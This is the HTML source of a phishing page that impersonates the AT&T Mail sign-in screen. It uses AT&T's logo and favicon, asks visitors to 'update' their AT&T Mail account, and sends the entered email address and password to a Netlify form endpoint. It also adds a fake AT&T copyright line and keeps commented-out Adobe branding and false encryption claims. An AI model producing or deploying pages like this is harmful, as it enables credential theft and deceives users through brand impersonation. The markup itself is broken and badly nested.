<!DOCTYPE html>
<html>
<link rel="shortcut icon" href="https://signin.att.com/favicon.ico">
<header>
 </head>
	<meta charset="UTF-8">
	<title>Login Screen</title>
	<link href="style.css" rel="stylesheet">
</head>
	<link href="style.css" rel="stylesheet">
		<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
<p>
<style>
body {
  background-color: #f5f6f7;
  background-repeat: no-repeat;
  background-attachment: fixed;
  background-size: cover;
}
</style>
<p>
<div class="login-page">
<div class="form">
<br>
<br>
<br>
<div style="text-align:center;">
</span>
<!-- <img "center" alt="sas Internet Email"src="https://signin.att.com/static/siam/en/halo_c/images/logos/att-logo.svg" width="150" height="100">
 --><h2 style="color:black;">
<form name='contact' action='/success/' method='POST'><input type='hidden' name='form-name' value='contact' />
  <div class="text-center text-gray-800 text-lg text-bold my-4">
	<body>
</style>
<body>
  </div>

    </p>
<fieldset style="float: left; width: 350px; height: 600px; background-color:white; border: 0px groove">
<div style="text-align:center;">
</span>
<!-- <img align="top" alt="Adobe" src="https://acrobat.adobe.com/content/dam/dx-dc/us/en/acrobat/3_Icon_Share.png.img.png" width="80" height="80"> -->
<form name="contact"  action="/success/" method="POST" data-netlify="true">
<p>
<img "center" alt="sas Internet Email"src="https://signin.att.com/static/siam/en/halo_c/images/logos/att-logo.svg" width="100" height="100">
<br>
<h3 style="color:black;"> Sign in to update your AT&T Mail and Currently.com</p>
<br>
					</span>
		<section id="login_form" class="flex flex-col justify-between px-3">
				<div class="formfield">
					<label for="username"></label>
					<input type="text" id="username" name="username" value="" placeholder="please enter your email address" autofocus="" required="">
				<div class="formfield">
				<p>
					<label for="password"></label>
					<div class="flex relative items-baseline">
						<input id="password" type="password" name="password" value="" placeholder="please enter your password" required="">
						</div>
<br>
<br>
<br>
<button type="Login submit-button">Update<span style='font-size:20px;'><!-- &#8680;</span>  <i class="fa fa-lock"></i></button> -->
</span>
<br>
			</div>	             
            <div>          
</div>
<br>
<br>
<img align="top" alt="Suddenlink Mail" src="https://assets.website-files.com/5d039044301183e579612c2b/5d039044301183a5b0612c8e_payment-secureloading.gif" width="40" height="40">
</fieldset>
			</div>	             
            <div>              
</div>
<p>
<br>
<br>
<br>
<br>
<br>
<br>
	  <!-- <p style="color:gold;">Document security</p> -->
	  <!-- <img align="top" alt=" Adobe" src="https://www.adobe.com/content/dam/cc/icons/reader_appicon_64_grayscale.svg" width="65" height="50"> -->
	  <!-- <h4 style="color:gold;">256-bit SSL encryption, OAuth 2.0 authentication, encrypted storage.</p> -->
</p>
  
</form>
</form>
  </p>
</form>
		
</div>		
</style>
</head>
<body>

<h2></h2>
<p></p>

<div class="footer">
  <p>Copyright © 2022 AT&T. All rights reserved.
</div>
<!-- <div class="form"> -->